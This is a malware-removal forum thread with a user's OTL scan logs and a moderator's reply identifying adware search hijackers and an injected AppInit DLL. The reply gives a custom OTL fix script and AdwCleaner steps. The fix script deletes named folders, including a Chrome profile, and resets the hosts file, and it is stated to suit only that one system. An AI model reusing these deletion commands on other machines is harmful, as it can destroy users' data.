30/08/2011 08:56 PM <JUNCTION> NetHood [C:\Users\VPaez\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
30/08/2011 08:56 PM <JUNCTION> PrintHood [C:\Users\VPaez\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
30/08/2011 08:56 PM <JUNCTION> Recent [C:\Users\VPaez\AppData\Roaming\Microsoft\Windows\Recent]
30/08/2011 08:56 PM <JUNCTION> SendTo [C:\Users\VPaez\AppData\Roaming\Microsoft\Windows\SendTo]
30/08/2011 08:56 PM <JUNCTION> Start Menu [C:\Users\VPaez\AppData\Roaming\Microsoft\Windows\Start Menu]
30/08/2011 08:56 PM <JUNCTION> Templates [C:\Users\VPaez\AppData\Roaming\Microsoft\Windows\Templates]
0 File(s) 0 bytes
Directory of C:\Users\VPaez\AppData\Local
30/08/2011 08:56 PM <JUNCTION> Application Data [C:\Users\VPaez\AppData\Local]
30/08/2011 08:56 PM <JUNCTION> History [C:\Users\VPaez\AppData\Local\Microsoft\Windows\History]
30/08/2011 08:56 PM <JUNCTION> Temporary Internet Files [C:\Users\VPaez\AppData\Local\Microsoft\Windows\Temporary Internet Files]
0 File(s) 0 bytes
Directory of C:\Users\VPaez\Documents
30/08/2011 08:56 PM <JUNCTION> My Music [C:\Users\VPaez\Music]
30/08/2011 08:56 PM <JUNCTION> My Pictures [C:\Users\VPaez\Pictures]
30/08/2011 08:56 PM <JUNCTION> My Videos [C:\Users\VPaez\Videos]
0 File(s) 0 bytes
Total Files Listed:
0 File(s) 0 bytes
66 Dir(s) 548,978,266,112 bytes free

< MD5 for: RPCSS.DLL >
[2010/11/20 21:24:01 | 000,512,000 | ---- | M] (Microsoft Corporation) MD5=5C627D1B1138676C0A7AB2C2C190D123 -- C:\Windows\SysNative\rpcss.dll
[2010/11/20 21:24:01 | 000,512,000 | ---- | M] (Microsoft Corporation) MD5=5C627D1B1138676C0A7AB2C2C190D123 -- C:\Windows\winsxs\amd64_microsoft-windows-com-base-qfe-rpcss_31bf3856ad364e35_6.1.7601.17514_none_c7f0e16b547f887d\rpcss.dll

< End of report >

Edited by Essexboy, 27 July 2014 - 03:53 AM.

  • 0

#4
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
A lot of adware there

Warning This fix is only relevant for this system and no other, using on another computer may cause problems

Be advised that when the fix commences it will shut down all running processes and you may lose the desktop and icons, they will return on reboot

Run OTL
  • Under the Custom Scans/Fixes box at the bottom, paste in the following
    OTL_Fix.GIF
:Commands
[CREATERESTOREPOINT]

:OTL
SRV - [2014/07/26 00:09:24 | 000,702,344 | ---- | M] (Cherished Technololgy LIMITED) [Auto | Running] -- C:\ProgramData\IePluginServices\PluginService.exe -- (IePluginServices)
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.v9.com/?t...psd&t=34640bb62
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.v9.com...q={searchTerms}
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://search.v9.com...q={searchTerms}
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.v9.com/?t...psd&t=34640bb62
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.v9.com/?t...psd&t=34640bb62
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.v9.com...q={searchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://search.v9.com...q={searchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Default_Page_URL = http://search.certif...t=home&tid=2938
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.v9.com/?t...psd&t=34640bb62
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://search.certif...d=2938&st=bs&q=
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Search Bar = http://search.certif...d=2938&st=bs&q=
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Search Page = http://search.certif...d=2938&st=bs&q=
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Start Default_Page_URL = http://search.certif...t=home&tid=2938
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Start Page = http://search.certif...t=home&tid=2938
IE - HKLM\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://search.certif...q={searchTerms}
IE - HKLM\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://search.v9.com...q={searchTerms}
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.v9.com/?t...psd&t=34640bb62
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.certif...d=2938&st=bs&q=
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://search.certif...d=2938&st=bs&q=
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://search.certif...d=2938&st=bs&q=
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Default_Page_URL = http://search.certif...t=home&tid=2938
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://search.certif...d=2938&st=bs&q=
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Internet Explorer\Search,Search Bar = http://search.certif...d=2938&st=bs&q=
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Internet Explorer\Search,Search Page = http://search.certif...d=2938&st=bs&q=
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Internet Explorer\Search,Start Default_Page_URL = http://search.certif...t=home&tid=2938
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Internet Explorer\Search,Start Page = http://search.certif...t=home&tid=2938
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\..\URLSearchHook: {687578b9-7132-4a7a-80e4-30ee31099e03} - No CLSID value found
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\..\SearchScopes,DefaultScope = 98A4F9928983430CA0DEE4493D379A23
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\..\SearchScopes\98A4F9928983430CA0DEE4493D379A23: "URL" = http://search.condui...6919856144&UM=2
FF - prefs.js..browser.search.defaultenginename: "v9"
O3 - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\..\Toolbar\WebBrowser: (no name) - {687578B9-7132-4A7A-80E4-30EE31099E03} - No CLSID value found.
O3 - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\..\Toolbar\WebBrowser: (no name) - {D4027C7F-154A-4066-A1AD-4243D8127440} - No CLSID value found.
O20:64bit: - AppInit_DLLs: (C:\PROGRA~2\GSSUPP~1\ASSIST~2.DLL) - C:\Program Files (x86)\GS Supporter\Assistant_x64.dll ()
O20 - AppInit_DLLs: (c:\progra~2\gssupp~1\assist~1.dll) - c:\Program Files (x86)\GS Supporter\Assistant.dll ()
[2014/07/26 00:09:55 | 000,000,000 | ---D | C] -- C:\Users\VPaez\AppData\Local\Network_Me_07260609
[2014/07/26 00:09:26 | 000,000,000 | ---D | C] -- C:\ProgramData\IePluginServices
[2014/07/03 14:00:37 | 000,000,000 | ---D | C] -- C:\ProgramData\ExastraCouupoann
[2014/07/26 19:59:34 | 000,000,432 | -H-- | M] () -- C:\Windows\tasks\SN.Booster-S-482248051.job
[2013/03/20 10:02:41 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\Systweak

:Files
c:\ProgramData\MyApps\SN.Booster
C:\Users\VPaez\AppData\Local\Google\Chrome

:Commands
[resethosts]
[emptytemp]
[Reboot]
  • Then click the Run Fix button at the top
  • Let the program run unhindered, reboot the PC when it is done
  • Open OTL again and click the Quick Scan button. Post the log it produces in your next reply.
THEN

Please download AdwCleaner by Xplode onto your desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click on Scan.
  • After the scan is complete click on "Clean"
  • Confirm each time with Ok.
  • Your computer will be rebooted automatically. A text file will open after the restart.
  • Please post the content of that logfile with your next answer.
  • You can find the logfile at C:\AdwCleaner[S1].txt as well.

  • 0

#5
inked_illusion

inked_illusion

    New Member

  • Topic Starter
  • Member
  • Pip
  • 5 posts

Here's the updated log:

 

OTL logfile created on: 7/27/2014 8:54:38 AM - Run 4
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\VPaez\Desktop\Ian's stuff
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17207)
Locale: 00000409 | Country: Canada | Language: ENC | Date Format: dd/MM/yyyy
 
3.91 Gb Total Physical Memory | 2.36 Gb Available Physical Memory | 60.47% Memory free
7.82 Gb Paging File | 6.22 Gb Available in Paging File | 79.60% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 919.48 Gb Total Space | 510.79 Gb Free Space | 55.55% Space Free | Partition Type: NTFS
Drive D: | 11.93 Gb Total Space | 1.46 Gb Free Space | 12.23% Space Free | Partition Type: NTFS
Drive E: | 275.41 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: CDFS
 
Computer Name: VPAEZ-HP | User Name: VPaez | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2014/07/26 02:13:49 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\VPaez\Desktop\Ian's stuff\OTL.exe
PRC - [2014/06/18 20:53:22 | 000,275,568 | ---- | M] (Mozilla Corporation) -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe
PRC - [2013/12/18 12:42:32 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2011/04/24 23:15:02 | 000,202,296 | ---- | M] (Kaspersky Lab ZAO) -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\avp.exe
PRC - [2011/02/01 02:49:44 | 001,127,448 | ---- | M] (PDF Complete Inc) -- C:\Program Files (x86)\PDF Complete\pdfsvc.exe
PRC - [2011/02/01 01:41:24 | 002,656,280 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
PRC - [2011/02/01 01:41:20 | 000,326,168 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/06/18 20:53:21 | 003,852,912 | ---- | M] () -- C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
MOD - [2014/02/12 20:58:32 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2014/02/12 20:58:10 | 001,044,808 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2011/04/24 23:13:30 | 007,008,656 | ---- | M] () -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\qtgui4.dll
MOD - [2011/04/24 23:13:28 | 000,192,912 | ---- | M] () -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\qtsql4.dll
MOD - [2011/04/24 23:13:26 | 001,270,160 | ---- | M] () -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\qtscript4.dll
MOD - [2011/04/24 23:13:26 | 000,758,160 | ---- | M] () -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\qtnetwork4.dll
MOD - [2011/04/24 23:13:24 | 002,118,032 | ---- | M] () -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\qtcore4.dll
MOD - [2011/04/24 23:13:24 | 002,089,360 | ---- | M] () -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\qtdeclarative4.dll
MOD - [2011/04/20 19:56:28 | 000,025,088 | ---- | M] () -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\imageformats\qgif4.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2014/06/18 18:24:12 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2013/05/26 23:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2010/12/13 14:37:16 | 000,194,416 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft LifeCam\MSCamS64.exe -- (MSCamSvc)
SRV:64bit: - [2010/10/11 03:48:14 | 000,346,168 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe -- (HPClientSvc)
SRV:64bit: - [2010/09/22 19:10:10 | 000,057,184 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Windows Live\Mesh\wlcrasvc.exe -- (wlcrasvc)
SRV:64bit: - [2009/07/13 19:39:31 | 000,045,568 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\rundll32.exe -- (e9f32388)
SRV - [2014/07/08 16:21:08 | 000,262,320 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/06/30 15:46:52 | 000,542,400 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014/06/18 20:53:21 | 000,119,408 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2013/12/18 12:42:32 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2013/09/11 22:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2013/09/05 10:34:30 | 000,171,680 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2012/12/04 11:13:34 | 000,008,704 | ---- | M] (Hi-Rez Studios) [Auto | Paused] -- C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe -- (HiPatchService)
SRV - [2011/04/24 23:15:02 | 000,202,296 | ---- | M] (Kaspersky Lab ZAO) [Auto | Running] -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\avp.exe -- (AVP)
SRV - [2011/02/01 02:49:44 | 001,127,448 | ---- | M] (PDF Complete Inc) [Auto | Running] -- C:\Program Files (x86)\PDF Complete\pdfsvc.exe -- (pdfcDispatcher)
SRV - [2011/02/01 01:41:24 | 002,656,280 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2011/02/01 01:41:20 | 000,326,168 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2010/10/12 11:59:12 | 000,206,072 | ---- | M] (WildTangent, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe -- (GamesAppService)
SRV - [2009/06/10 15:23:09 | 000,066,384 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2013/07/08 11:36:41 | 000,283,064 | ---- | M] (Disc Soft Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV:64bit: - [2012/12/13 14:50:36 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:64bit: - [2012/08/21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:64bit: - [2012/03/23 14:59:34 | 000,615,728 | ---- | M] (Kaspersky Lab) [File_System | System | Running] -- C:\Windows\SysNative\drivers\klif.sys -- (KLIF)
DRV:64bit: - [2012/03/01 00:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2011/12/15 10:32:29 | 000,087,456 | ---- | M] (LogMeIn, Inc.) [File_System | Disabled | Stopped] -- C:\Windows\SysNative\LMIRfsClientNP.dll -- (LMIRfsClientNP)
DRV:64bit: - [2011/05/13 15:37:54 | 000,048,488 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fssfltr.sys -- (fssfltr)
DRV:64bit: - [2011/05/13 04:21:04 | 000,177,640 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ssadmdm.sys -- (ssadmdm)
DRV:64bit: - [2011/05/13 04:21:04 | 000,146,920 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ssadserd.sys -- (ssadserd)
DRV:64bit: - [2011/05/13 04:21:02 | 000,157,672 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ssadbus.sys -- (ssadbus)
DRV:64bit: - [2011/05/13 04:21:02 | 000,036,328 | ---- | M] (Google Inc) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ssadadb.sys -- (androidusb)
DRV:64bit: - [2011/05/13 04:21:02 | 000,016,872 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ssadmdfl.sys -- (ssadmdfl)
DRV:64bit: - [2011/03/11 00:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2011/03/11 00:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2011/03/10 18:36:24 | 000,029,488 | ---- | M] (Kaspersky Lab ZAO) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\klim6.sys -- (KLIM6)
DRV:64bit: - [2011/03/04 13:23:28 | 000,011,864 | ---- | M] (Kaspersky Lab ZAO) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\kl2.sys -- (kl2)
DRV:64bit: - [2011/03/04 13:23:24 | 000,460,888 | ---- | M] (Kaspersky Lab ZAO) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\kl1.sys -- (KL1)
DRV:64bit: - [2011/01/26 20:57:12 | 012,273,408 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2011/01/11 19:04:04 | 000,072,216 | ---- | M] (LogMeIn, Inc.) [File_System | Auto | Running] -- C:\Windows\SysNative\drivers\LMIRfsDriver.sys -- (LMIRfsDriver)
DRV:64bit: - [2011/01/11 19:04:00 | 000,011,552 | ---- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\lmimirr.sys -- (lmimirr)
DRV:64bit: - [2010/12/28 13:45:54 | 000,412,776 | ---- | M] (Realtek                                            ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:64bit: - [2010/12/13 14:37:18 | 000,036,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nx6000.sys -- (MSHUSBVideo)
DRV:64bit: - [2010/11/20 21:24:33 | 000,059,392 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2010/11/20 21:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/11/20 21:23:47 | 000,031,232 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2010/11/05 12:45:48 | 000,438,808 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStor.sys -- (iaStor)
DRV:64bit: - [2010/11/04 22:57:54 | 001,041,760 | ---- | M] (Ralink Technology, Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netr28x.sys -- (netr28x)
DRV:64bit: - [2010/10/19 05:34:26 | 000,056,344 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:64bit: - [2010/02/26 03:32:12 | 000,158,976 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Impcd.sys -- (Impcd)
DRV:64bit: - [2009/11/02 20:27:10 | 000,022,544 | ---- | M] (Kaspersky Lab) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\klmouflt.sys -- (klmouflt)
DRV:64bit: - [2009/07/13 19:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/13 19:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/13 19:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/06/10 14:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/10 14:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/06/10 14:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009/06/10 14:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2009/03/18 17:35:42 | 000,033,856 | -H-- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hamachi.sys -- (hamachi)
DRV:64bit: - [2008/11/11 14:42:00 | 000,033,792 | ---- | M] (LG Electronics Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lgx64modem.sys -- (USBModem)
DRV:64bit: - [2008/11/11 14:42:00 | 000,027,136 | ---- | M] (LG Electronics Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lgx64diag.sys -- (UsbDiag)
DRV:64bit: - [2008/11/11 14:42:00 | 000,017,920 | ---- | M] (LG Electronics Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lgx64bus.sys -- (usbbus)
DRV - [2009/07/13 19:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL =
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL =
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page =
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page =
IE:64bit: - HKLM\..\SearchScopes,DefaultScope =
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...rc=IE-SearchBox
IE:64bit: - HKLM\..\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}: "URL" = http://search.ask.co...&l=dis&o=HPDTDF
IE:64bit: - HKLM\..\SearchScopes\{537A820F-7758-4D20-A1C6-818598E9FD0A}: "URL" = http://www.amazon.ca...s={searchTerms}
IE:64bit: - HKLM\..\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}: "URL" = http://ca.search.yah...psg&type=HPDTDF
IE:64bit: - HKLM\..\SearchScopes\{d43b3890-80c7-4010-a95d-1e77b5924dc3}: "URL" = http://en.wikipedia....h={searchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL =
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL =
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://search.certif...d=2938&st=bs&q=
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page =
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Default_Page_URL =
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page =
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL =
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Search Bar =
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Search Page =
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Start Default_Page_URL =
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Start Page =
IE - HKLM\..\SearchScopes,DefaultScope =
IE - HKLM\..\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}: "URL" = http://search.ask.co...&l=dis&o=HPDTDF
IE - HKLM\..\SearchScopes\{537A820F-7758-4D20-A1C6-818598E9FD0A}: "URL" = http://www.amazon.ca...s={searchTerms}
IE - HKLM\..\SearchScopes\{afdbddaa-5d3f-42ee-b79c-185a7020515b}: "URL" = http://www.bing.com/...rc=IE-SearchBox
IE - HKLM\..\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}: "URL" = http://ca.search.yah...psg&type=HPDTDF
IE - HKLM\..\SearchScopes\{d43b3890-80c7-4010-a95d-1e77b5924dc3}: "URL" = http://en.wikipedia....h={searchTerms}
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL =
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL =
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar =
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page =
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Default_Page_URL =
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:Tabs
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL =
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,Search Bar =
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,Search Page =
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,Start Default_Page_URL =
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,Start Page =
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
